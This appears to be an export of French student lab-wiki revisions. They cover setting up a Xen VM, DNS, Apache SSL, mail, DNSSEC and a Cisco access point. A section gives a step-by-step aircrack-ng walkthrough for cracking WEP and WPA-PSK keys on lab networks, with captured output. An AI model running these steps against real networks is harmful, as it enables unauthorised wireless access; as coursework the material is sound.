&lt;br /&gt;
Pour prendre en compte les paramètres changés dans les fichiers ci-dessous, il suffit d'effectuer les commandes:&lt;br /&gt;
&amp;lt;pre&amp;gt;service bind9 stop&lt;br /&gt;
service bind9 start&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour observer le bon fonctionnement de notre serveur, on peut visualiser les informations sur&lt;br /&gt;
&lt;br /&gt;
&amp;lt;i&amp;gt;cat /var/log/daemon.log&amp;lt;/i&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Puis un ping de notre page internet peut nous montrer également son bon fonctionnement&lt;br /&gt;
Si tout cela fonctionne on peut se rendre sur notre page.&lt;br /&gt;
Pour modifier les informations visible sur la page, il suffit d'aller dans &lt;br /&gt;
&amp;lt;i&amp;gt;/var/www/html/index.html&amp;lt;/i&amp;gt;. Toutes les informations écrites dans ce fichier seront visible sur notre page.&lt;br /&gt;
&lt;br /&gt;
===Installation boite mail===&lt;br /&gt;
&lt;br /&gt;
On commence par un installer postfix qui est un serveur de messagerie électronique.&lt;br /&gt;
&amp;lt;pre&amp;gt;apt-get install postfix&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois postfix installé, on indique le nom de domaine (orelsan.website) dans la configuration&lt;br /&gt;
&lt;br /&gt;
Dans &amp;lt;i&amp;gt;/etc/aliases&amp;lt;/i&amp;gt; on ajoute:&lt;br /&gt;
&amp;lt;pre&amp;gt;admin:root&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Puis on utilise la commande&lt;br /&gt;
&amp;lt;pre&amp;gt;newaliases&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On installe également bsd-mailx qui est un agent de courriel utilisateur simple.&lt;br /&gt;
&amp;lt;pre&amp;gt;apt-get install bsd-mailx&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Et pour observer nos mail, on tape la commande &amp;lt;i&amp;gt;mail&amp;lt;/i&amp;gt; dans la console.&lt;br /&gt;
L'adresse mail est admin@orelsan.website.&lt;br /&gt;
&lt;br /&gt;
===Générer une demande de certificat en SHA 2===&lt;br /&gt;
&amp;lt;pre&amp;gt;openssl req -nodes -newkey rsa:2048 -sha256 -keyout monserveur.key -out serveur.csr&lt;br /&gt;
&lt;br /&gt;
Country Name (2 letter code) [AU]:fr&lt;br /&gt;
State or Province Name (full name) [Some-State]:North&lt;br /&gt;
Locality Name (eg, city) []:Lille&lt;br /&gt;
Organization Name (eg, company) [Internet Widgits Pty Ltd]:Polytech&lt;br /&gt;
Organizational Unit Name (eg, section) []:IMA&lt;br /&gt;
Common Name (e.g. server FQDN or YOUR name) []:orelsan.website&lt;br /&gt;
Email Address []:admin@orelsan.website&lt;br /&gt;
&lt;br /&gt;
Please enter the following 'extra' attributes&lt;br /&gt;
to be sent with your certificate request&lt;br /&gt;
A challenge password []:&lt;br /&gt;
An optional company name []:&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Cette fonction nous crée 2 fichiers :&lt;br /&gt;
monserveur.key	serveur.csr&lt;br /&gt;
&lt;br /&gt;
-monserveur.key contient la clé privée.&lt;br /&gt;
&lt;br /&gt;
-serveur.csr contient la clé public.&lt;br /&gt;
&lt;br /&gt;
On va maintenant ajouter la clé public sur gandi pour qu'il nous génère un certificat.&lt;br /&gt;
On crée 2 fichier avec :&lt;br /&gt;
&lt;br /&gt;
-inter.crt qui contient le certificat intermédiaire.&lt;br /&gt;
&lt;br /&gt;
-gandi.crt qui qui contient le certificat .&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Orelsan:~# ls&lt;br /&gt;
gandi.crt  inter.crt  mbox  monserveur.key  serveur.csr&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Dans le fichier &amp;lt;i&amp;gt;/etc/apache2/sites-enabled/000-default.conf&amp;lt;/i&amp;gt; on écrit: &lt;br /&gt;
&amp;lt;pre&amp;gt;&amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
&lt;br /&gt;
        ServerName www.orelsan.website&lt;br /&gt;
        ServerAlias orelsan.website&lt;br /&gt;
        DocumentRoot /var/www/html&lt;br /&gt;
        CustomLog /var/log/apache2/secure_access.log combined&lt;br /&gt;
&lt;br /&gt;
        SSLEngine on&lt;br /&gt;
	SLCertificateFile /root/gandi.crt&lt;br /&gt;
        SSLCertificateKeyFile /root/monserveur.key&lt;br /&gt;
        SSLCertificateChainFile /root/inter.crt&lt;br /&gt;
	SSLVerifyClient None&lt;br /&gt;
&amp;lt;/VirtualHost&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== DNSSEC ===&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, nous ajoutons l'option ci dessous dans le fichier &amp;lt;i&amp;gt;named.conf.options&amp;lt;/i&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;dnssec-enable yes &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Dans un répertoire, nous créons d'abord la clé asymétrique de signature puis celle de zone :&lt;br /&gt;
&amp;lt;pre&amp;gt;dnssec-keygen -a RSASHA1 -b 2048 -f KSK -r /dev/urandom -n ZONE orelsan.website &lt;br /&gt;
dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE orelsan.website&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Après avoir renommé les noms de nos clé, nous ajoutons dans notre fichier de zone &lt;br /&gt;
&amp;lt;pre&amp;gt;$include /etc/bind/orelsan.website.dnssec/orelsan.website-ksk.key&lt;br /&gt;
$include /etc/bind/orelsan.website.dnssec/orelsan.website-zsk.key &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
et pour signez les enregistrements de la zone, nous utilisons la commande :&lt;br /&gt;
&amp;lt;pre&amp;gt;dnssec-signzone -o orelsan.website -k orelsan.website-ksk ../orelsan.website/orelsan orelsan.website-zsk&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Cassage clé ==&lt;br /&gt;
Pour le crackage de clé, nous allons utiliser le package aircrack-ng qui est un ensemble d'outils permettant de tester la sécurité d'un réseau&lt;br /&gt;
=== Cassage de clé WEP ===&lt;br /&gt;
Commençons par detecter notre interface wifi par le biais d'un&lt;br /&gt;
&amp;lt;pre&amp;gt;ifconfig&amp;lt;/pre&amp;gt;&lt;br /&gt;
ou&lt;br /&gt;
&amp;lt;pre&amp;gt;iwconfig&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Notre interface est wlan2 qui correspond à la clé wifi ajoutée sur l'ordinateur.&lt;br /&gt;
&lt;br /&gt;
Nous pouvons ainsi commencer à utiliser les outils de aircrack en debutant par &lt;br /&gt;
&amp;lt;pre&amp;gt;airmon-ng start wlan2 &amp;lt;/pre&amp;gt;&lt;br /&gt;
Cette commande permet de mettre en mode moniteur notre interface wifi&lt;br /&gt;
Si tout se passe correctement, vous allez voir apparaitre&lt;br /&gt;
&amp;lt;pre&amp;gt;creation du mon0&lt;br /&gt;
&lt;br /&gt;
Interface	Chipset		Driver&lt;br /&gt;
&lt;br /&gt;
mon0		Ralink RT2870/3070	rt2800usb - [phy1]&lt;br /&gt;
wlan0		Broadcom	wl - [phy0]&lt;br /&gt;
wlan2		Ralink RT2870/3070	rt2800usb - [phy1]&lt;br /&gt;
				(monitor mode enabled on mon1)&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Nous observons bien que le mode moniteur est activé pour notre wlan2.&lt;br /&gt;
&lt;br /&gt;
Nous pouvons observer tous les réseaux grâce à la commande &lt;br /&gt;
&amp;lt;pre&amp;gt;airodump-ng wlan2&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois que nous avons repéré  la cracotte que nous voulons cracker on refait un airodump pour se focaliser sur cette cracotte&lt;br /&gt;
&amp;lt;pre&amp;gt;airodump-ng  wlan2 -c 8 -essid cracotte03 --bssid 04:DA:D2:9C:50:52 -w crack&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
-c permet de le selectrionner le channel de communication&lt;br /&gt;
-w le nom du fichier dans lequel airodump va enregistrer les données&lt;br /&gt;
--bssid permet d'indiquer l'adresse mac de la cible &lt;br /&gt;
--essid permet d'indique le ssid de la cible (nom du réseau)&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;CH  8 ][ Elapsed: 1 min ][ 2016-11-21 15:08                                         &lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 04:DA:D2:9C:50:52  -41  45      799    53316  506   8  54e. WEP  WEP         cracotte03                                             &lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                                                           &lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 04:DA:D2:9C:50:52  00:0F:B5:92:23:6A  -28   54e-54e   222    60221&amp;lt;/pre&amp;gt;  &lt;br /&gt;
&lt;br /&gt;
On peut visualiser le nombre de paquets qui transit. &lt;br /&gt;
Pour permettre le crackage de la clé WEP, un nombre de data important est necessaire. Pour obtenir plus de data, nous pouvons utiliser la commande aireplay dans un autre terminal.&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Piranha:/home/pifou#aireplay-ng -1 0 -e cracotte03 -a 04:DA:D2:9C:50:52 wlan2&lt;br /&gt;
No source MAC (-h) specified. Using the device MAC (40:A5:EF:05:AA:25)&lt;br /&gt;
15:00:01  Waiting for beacon frame (BSSID: 04:DA:D2:9C:50:51) on channel 8&lt;br /&gt;
&lt;br /&gt;
15:00:01  Sending Authentication Request (Open System)&lt;br /&gt;
&lt;br /&gt;
15:00:03  Sending Authentication Request (Open System)&lt;br /&gt;
&lt;br /&gt;
15:00:05  Sending Authentication Request (Open System) [ACK]&lt;br /&gt;
15:00:05  Authentication successful&lt;br /&gt;
15:00:05  Sending Association Request [ACK]&lt;br /&gt;
15:00:05  Association successful :-) (AID: 1) &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Et tout en laissant airodump ouvert sur un terminal, on vient trouver la clé WEP en utilisant la commande ci dessous dans un autre terminal&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Piranha:/home/pifou#aircrack-ng crack.cap &lt;br /&gt;
                                                            Aircrack-ng 1.2 beta3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                                            [00:00:39] Tested 257766 keys (got 32866 IVs)&lt;br /&gt;
&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    0/  1   EE(46080) B9(39936) 70(39680) B2(39168) 86(38656) 11(38400) B4(38400) F2(38400) A1(38144) 24(37632) &lt;br /&gt;
    1    0/  1   EE(45824) 11(44544) 7B(42240) 05(40960) 93(40448) C4(40448) EE(40448) 1C(39168) 3E(39168) 42(38912) &lt;br /&gt;
    2    0/  1   EE(45568) 36(42240) 6A(42240) 0D(40192) DC(39680) 98(39424) F3(39424) 39(39168) 3E(38912) B6(38656) &lt;br /&gt;
    3    0/  1   EE(48640) 11(43520) 61(40448) E6(40448) 00(38912) 9C(38656) EF(38656) 30(38400) B7(38400) 2A(38144) &lt;br /&gt;
    4    0/  1   EE(42240) 77(40960) AA(39936) 86(39424) F2(39168) FE(39168) 95(38912) 69(38656) 73(38656) AF(38656) &lt;br /&gt;
    5    1/  2   EE(42752) A2(41728) 34(41216) 46(40448) 0B(39680) 50(39424) 6C(39168) BA(39168) 7D(38912) 66(38656) &lt;br /&gt;
    6    0/  1   EE(44032) 8D(43264) 9F(40960) A0(40960) 74(40704) 17(40448) 91(39936) 66(39424) 5A(39168) C4(38912) &lt;br /&gt;
    7    0/  1   EE(44032) 36(40192) 4D(39680) 3D(39168) BF(39168) EC(38912) 9D(38656) EF(38656) A9(38400) B4(38144) &lt;br /&gt;
    8    0/  1   EE(48128) 35(40448) C1(39680) 9E(39424) F3(39424) C8(39168) 36(38656) 2E(38144) 7A(38144) C5(38144) &lt;br /&gt;
    9    0/  1   EE(45312) 74(42496) E7(40960) 6C(40192) 28(39936) 1B(39680) AF(39680) 71(38656) 44(38400) 2C(37888) &lt;br /&gt;
   10    3/  1   62(39424) BC(39424) 48(39168) 56(38912) AF(38912) 23(38400) 98(38400) A7(38144) 2B(37888) 79(37888) &lt;br /&gt;
   11    5/  1   68(38656) E9(38656) F9(38656) 1E(38400) 36(38400) 5A(38144) 92(38144) 5C(37888) 87(37888) CB(37888) &lt;br /&gt;
   12    0/  2   79(40780) 62(40380) 4D(40156) 85(39388) DE(39280) 4E(39060) 98(38876) A7(38544) 6A(38432) 82(38144) &lt;br /&gt;
&lt;br /&gt;
             KEY FOUND! [ EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:E4:44 ] &lt;br /&gt;
	Decrypted correctly: 100%&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Cassage de clé WPA-PSK ===&lt;br /&gt;
Le cassage de clé WPA est légèrement diffèrent de celui WEP. Nous utilisons les mêmes outils (aircrack-ng) mais nous devons fournir un dictionnaire avec tous les mots de passe. Dans notre cas, nous avons décidé de prendre une clé de 8 chiffres. &lt;br /&gt;
Nous utilisons pour commencer&lt;br /&gt;
&amp;lt;pre&amp;gt;airmon-ng start wlan2 &amp;lt;/pre&amp;gt;&lt;br /&gt;
Puis&lt;br /&gt;
&amp;lt;pre&amp;gt;airodump-ng --encrypt wpa mon0 -c 6 -w Poney --bssid 30:5A:3A:15:F6:3F&amp;lt;/pre&amp;gt;&lt;br /&gt;
--encrypt permet de sélectionner le type d'encryption souhaité.&lt;br /&gt;
&amp;lt;pre&amp;gt; CH  6 ][ Elapsed: 2 mins ][ 2016-11-21 16:18 ][ WPA handshake: 30:5A:3A:15:F6:3F                                         &lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 30:5A:3A:15:F6:3F  -34 100      738     1323   26   6  54e  WPA2 CCMP   PSK  Poneyus                                                &lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                                                           &lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 30:5A:3A:15:F6:3F  74:29:AF:F3:FD:91  -16    1e- 1     75      265                                                                   &lt;br /&gt;
 30:5A:3A:15:F6:3F  04:DB:56:3D:FD:A2  -40    0e- 0e  4709     1367 &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Un appareil doit se connecter sur notre réseau pour pouvoir avoir l'option &amp;lt;i&amp;gt;handshake&amp;lt;/i&amp;gt;&lt;br /&gt;
&lt;br /&gt;
et nous pouvons utiliser la commande&lt;br /&gt;
&amp;lt;pre&amp;gt; aircrack-ng Poney.cap dico.txt&amp;lt;/pre&amp;gt;&lt;br /&gt;
Cette commande va tester chaque mot de passe 1 par 1 présent dans notre fichier dico.txt &lt;br /&gt;
Et au bout d'une heure nous parvenons à retrouver la clé WPA .&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;                                 Aircrack-ng 1.2 beta3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                   [01:01:16] 2857196 keys tested (792.44 k/s)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                           KEY FOUND! [ 02857193 ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
      Master Key     : E7 06 15 6B 6D BA 3F 42 AD 01 AF 05 DC A3 81 14 &lt;br /&gt;
                       D0 1A 64 4A B9 B3 C4 0B CF 4A 87 6F 80 FE 54 88 &lt;br /&gt;
&lt;br /&gt;
      Transient Key  : D1 40 F8 7B 0A 2E 00 9B DC 2D DE AD 1A 7A 19 07 &lt;br /&gt;
                       C5 D1 25 0C F3 18 3A 48 25 31 B0 57 40 93 41 30 &lt;br /&gt;
                       21 37 82 9F 56 2A 1A 97 F2 35 F3 F9 BC AF 42 14 &lt;br /&gt;
                       22 4B 49 EA 0A 2A 90 21 C9 F4 C0 13 80 1E 76 B2 &lt;br /&gt;
&lt;br /&gt;
      EAPOL HMAC     : B2 1E E7 D3 78 D6 1A 5F C8 36 63 E7 81 8B EE D1 &amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Jturut</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2016/2017_G4&amp;diff=35652</id>
		<title>TP sysres IMA2a5 2016/2017 G4</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2016/2017_G4&amp;diff=35652"/>
				<updated>2016-12-06T10:54:26Z</updated>
		
		<summary type="html">&lt;p&gt;Jturut : /* Configuration du point d'accés Cisco */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;{| class=&amp;quot;wikitable centre&amp;quot; width=&amp;quot;100%&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
! scope=col | N° VLAN&lt;br /&gt;
! scope=col | Prénom&lt;br /&gt;
! scope=col | Réseau local&lt;br /&gt;
! scope=col | Nom VM&lt;br /&gt;
! scope=col | @IP VM &lt;br /&gt;
|-&lt;br /&gt;
| VLAN20        &lt;br /&gt;
| Dimitri          &lt;br /&gt;
| 10.60.20.0/24&lt;br /&gt;
| Vald&lt;br /&gt;
|193.48.57.182/28&lt;br /&gt;
|-&lt;br /&gt;
|VLAN21           &lt;br /&gt;
| Nabil         &lt;br /&gt;
| 10.60.21.0/24&lt;br /&gt;
| Pnl&lt;br /&gt;
|193.48.57.177/28&lt;br /&gt;
|-&lt;br /&gt;
| VLAN22&lt;br /&gt;
| Otmane              &lt;br /&gt;
| 10.60.22.0/24&lt;br /&gt;
| Lartiste&lt;br /&gt;
| 193.48.57.178/28&lt;br /&gt;
|-&lt;br /&gt;
| VLAN23  &lt;br /&gt;
| Hugo               &lt;br /&gt;
| 10.60.23.0/24 &lt;br /&gt;
| Gradur&lt;br /&gt;
| 193.48.57.179/28&lt;br /&gt;
|-&lt;br /&gt;
| VLAN24 &lt;br /&gt;
| Clement              &lt;br /&gt;
| 10.60.24.0/24 &lt;br /&gt;
| Gringe&lt;br /&gt;
| 193.48.57.180/28&lt;br /&gt;
|-&lt;br /&gt;
| VLAN25   &lt;br /&gt;
| Joan            &lt;br /&gt;
| 10.60.25.0/24 &lt;br /&gt;
| Orelsan&lt;br /&gt;
| 193.48.57.181/28&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== Configuration du point d'accés Cisco ==&lt;br /&gt;
&lt;br /&gt;
On vient dans un premier temps brancher le point d'accés Cisco et à l'aide de la commande ci dessous, on trouve sur quelle port USB se trouve notre point d'accés&lt;br /&gt;
&amp;lt;pre&amp;gt;dmesg | grep tty&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour configurer notre Cisco, on utilise &amp;lt;i&amp;gt;minicom -os&amp;lt;/i&amp;gt; et pour cela nous devons être en root&lt;br /&gt;
&lt;br /&gt;
Une fois minicom lancé, on vient changer les paramètre de notre Cisco&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;A - Serial Device           : /dev/ttyUSB0&lt;br /&gt;
B - Lockfile Location       : /var/lock &lt;br /&gt;
C - Callin Program          :&lt;br /&gt;
D - Callout Program         :&lt;br /&gt;
E - Bps/Par/Bits            : 9600 8N1&lt;br /&gt;
F - Hardware Flow Control   : No&lt;br /&gt;
G - Software Flow Control   : No&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
On se connecte en admin sur le Cisco &lt;br /&gt;
&amp;lt;Pre&amp;gt;enable&lt;br /&gt;
config terminal&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Configuration du SSID&lt;br /&gt;
&amp;lt;pre&amp;gt;dot11 ssid MAMENE&lt;br /&gt;
authentication open&lt;br /&gt;
guest-mode&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Configuraiton de l'interface Dot11Radio0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
interface Dot11Radio0&lt;br /&gt;
encryption key 1 size 40bit 7 A3C2590B73A0 transmit-key&lt;br /&gt;
encryption mode wep mandatory&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour permettre l'accés a notre Cisco par adresse mac, on va chercher l'adresse mac des ordinateurs et venir les ajouter dans la liste d'accés de notre point d'accés&lt;br /&gt;
&amp;lt;pre&amp;gt;access-list 701 permit 5cb9.0180.a039   0000.0000.0000&lt;br /&gt;
access-list 701 permit 3ca8.2a7a.05c5   0000.0000.0000&lt;br /&gt;
access-list 701 permit 7429.aff3.fd91   0000.0000.0000&lt;br /&gt;
access-list 701 permit 5cb9.0180.a139   0000.0000.0000&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Installation d'une machine virtuelle ==&lt;br /&gt;
L'installation s'effectuée à l'aide du logiciel de virtualisation Xen. Nous possédons qu'un seul serveur pour 6. C'est pour cela qu'on passe par la création d'une machine virtuel pour que chacun puisse réaliser une serveur DNS, Apache sur sa machine virtuel.&lt;br /&gt;
Pour créer la machine virtuel, on tape la commande suivante :&lt;br /&gt;
&amp;lt;pre&amp;gt; xen-create-image --hostname Orelsan --ip 193.48.57.181 --netmask 255.255.255.240 --dir /usr/local/xen&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Entre deux séances de TP, nous avons eu un changement de version du kernel Linux. De ce fait il a fallu modifier le fichier &amp;lt;i&amp;gt;orelsan.cfg&amp;lt;/i&amp;gt; en remplaçant la version 3.14 en 3.16.0 &lt;br /&gt;
&amp;lt;pre&amp;gt; kernel      = '/boot/vmlinuz-3.16.0-4-amd64'&lt;br /&gt;
 extra       = 'elevator=noop'&lt;br /&gt;
 ramdisk     = '/boot/initrd.img-3.16.0-4-amd64'&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Lancement de notre machine virtuelle &lt;br /&gt;
&amp;lt;pre&amp;gt; xl create Orelsan.cvg &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Connection à notre machine virtuelle&lt;br /&gt;
&amp;lt;pre&amp;gt; xl console Orelsan &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On peut également voir la liste de toutes les machines virtuelles ouvertes avec :&lt;br /&gt;
&amp;lt;pre&amp;gt; xl list &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois la connexion sur notre machine établie, nous devons changer le fichier &amp;lt;i&amp;gt;interfaces&amp;lt;/i&amp;gt; pour permettre une connexion à internet:&lt;br /&gt;
&amp;lt;pre&amp;gt;# The loopback network interface&lt;br /&gt;
auto lo&lt;br /&gt;
iface lo inet loopback&lt;br /&gt;
&lt;br /&gt;
# The primary network interface&lt;br /&gt;
auto eth0&lt;br /&gt;
iface eth0 inet static&lt;br /&gt;
        address 193.48.57.181&lt;br /&gt;
        netmask 255.255.255.240&lt;br /&gt;
        gateway 193.48.57.190&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Puis pour prendre en compte ses modifications nous utilisons :&lt;br /&gt;
&amp;lt;pre&amp;gt;ifdown&lt;br /&gt;
ifup&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Après un reboot de notre machine virtuelle, nous pouvons ainsi installer différents packages comme :&lt;br /&gt;
&amp;lt;pre&amp;gt; apt-get install vim &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Configuration du service internet ==&lt;br /&gt;
Pour cela, il nous faut réaliser un serveur DNS qui permet de lier un nom de domaine à une adresse IP. Ainsi qu'un serveur Apache qui est un serveur HTTP&lt;br /&gt;
&lt;br /&gt;
=== Installation du serveur HTTP ===&lt;br /&gt;
&amp;lt;pre&amp;gt; apt-get install apache2 &amp;lt;/pre&amp;gt;&lt;br /&gt;
=== Installation du serveur DNS ===&lt;br /&gt;
&amp;lt;pre&amp;gt; apt-get install bind9 &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Si cette installation vous indique une erreur, il faut modifier le fichier  &amp;lt;i&amp;gt;/etc/apt/apt.conf.d/01proxy&amp;lt;/i&amp;gt;&lt;br /&gt;
et remplacer &lt;br /&gt;
&amp;lt;pre&amp;gt; Acquire::http::Proxy &amp;quot;http://proxy.polytech-lille.fr:3128&amp;quot;; &amp;lt;/pre&amp;gt;&lt;br /&gt;
par&lt;br /&gt;
&amp;lt;pre&amp;gt; Acquire::http::Proxy &amp;quot;http://helfaut.escaut.net:3128&amp;quot;; &amp;lt;/pre&amp;gt;&lt;br /&gt;
Cette modification est du a la modification du proxy de l'école.&lt;br /&gt;
&lt;br /&gt;
===Configuration de notre nom de domaine===&lt;br /&gt;
&lt;br /&gt;
Après l'achat de notre nom de domaine &amp;lt;i&amp;gt;orelsan.website&amp;lt;/i&amp;gt; sur www.gandi.net on vient modifier le glue records pour lier notre adresse IP au nom de domaine&lt;br /&gt;
dns.orelsan.webiste -&amp;gt; 193.48.57.181&lt;br /&gt;
Ensuite on se rend dans l'onglet modifier les DNS et on change le DNS indiquer par celui vu juste précédemment.&lt;br /&gt;
Puis nous allons modifier 3 fichiers :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;i&amp;gt;/etc/bind/named.conf.options&amp;lt;/i&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;options {&lt;br /&gt;
   allow-transfer { &amp;quot;allowed_to_transfer&amp;quot;; };&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
acl &amp;quot;allowed_to_transfer&amp;quot; {&lt;br /&gt;
   217.70.177.40/32 ; //passerelle de gandi  par defaut&lt;br /&gt;
 };&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;i&amp;gt;/etc/bind/named.conf.local &amp;lt;/i&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;//&lt;br /&gt;
// Do any local configuration here&lt;br /&gt;
//&lt;br /&gt;
&lt;br /&gt;
// Consider adding the 1918 zones here, if they are not used in your&lt;br /&gt;
// organization&lt;br /&gt;
//include &amp;quot;/etc/bind/zones.rfc1918&amp;quot;;&lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;orelsan.website&amp;quot; {&lt;br /&gt;
   type master;&lt;br /&gt;
   file &amp;quot;/etc/bind/orelsan.website/orelsan&amp;quot;;&lt;br /&gt;
 };&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;i&amp;gt;/etc/bind/orelsan.website/orelsan&amp;lt;/i&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;$TTL 259200&lt;br /&gt;
@ IN SOA dns postmaster.orelsan.website. (&lt;br /&gt;
        20               ; Version&lt;br /&gt;
        7200             ; Refresh (2h)&lt;br /&gt;
        3600             ; Retry   (1h)&lt;br /&gt;
        1209600          ; Expire (14j)&lt;br /&gt;
        259200 )         ; Minimum TTL (3j)&lt;br /&gt;
         IN NS dns&lt;br /&gt;
         IN NS ns6.gandi.net.&lt;br /&gt;
         IN A       193.48.57.181&lt;br /&gt;
         IN MX      100 dns&lt;br /&gt;
&lt;br /&gt;
dns     IN A       193.48.57.181&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour prendre en compte les paramètres changés dans les fichiers ci-dessous, il suffit d'effectuer les commandes:&lt;br /&gt;
&amp;lt;pre&amp;gt;service bind9 stop&lt;br /&gt;
service bind9 start&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour observer le bon fonctionnement de notre serveur, on peut visualiser les informations sur&lt;br /&gt;
&lt;br /&gt;
&amp;lt;i&amp;gt;cat /var/log/daemon.log&amp;lt;/i&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Puis un ping de notre page internet peut nous montrer également son bon fonctionnement&lt;br /&gt;
Si tout cela fonctionne on peut se rendre sur notre page.&lt;br /&gt;
Pour modifier les informations visible sur la page, il suffit d'aller dans &lt;br /&gt;
&amp;lt;i&amp;gt;/var/www/html/index.html&amp;lt;/i&amp;gt;. Toutes les informations écrites dans ce fichier seront visible sur notre page.&lt;br /&gt;
&lt;br /&gt;
===Installation boite mail===&lt;br /&gt;
&lt;br /&gt;
On commence par un installer postfix qui est un serveur de messagerie électronique.&lt;br /&gt;
&amp;lt;pre&amp;gt;apt-get install postfix&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois postfix installé, on indique le nom de domaine (orelsan.website) dans la configuration&lt;br /&gt;
&lt;br /&gt;
Dans &amp;lt;i&amp;gt;/etc/aliases&amp;lt;/i&amp;gt; on ajoute:&lt;br /&gt;
&amp;lt;pre&amp;gt;admin:root&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Puis on utilise la commande&lt;br /&gt;
&amp;lt;pre&amp;gt;newaliases&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On installe également bsd-mailx qui est un agent de courriel utilisateur simple.&lt;br /&gt;
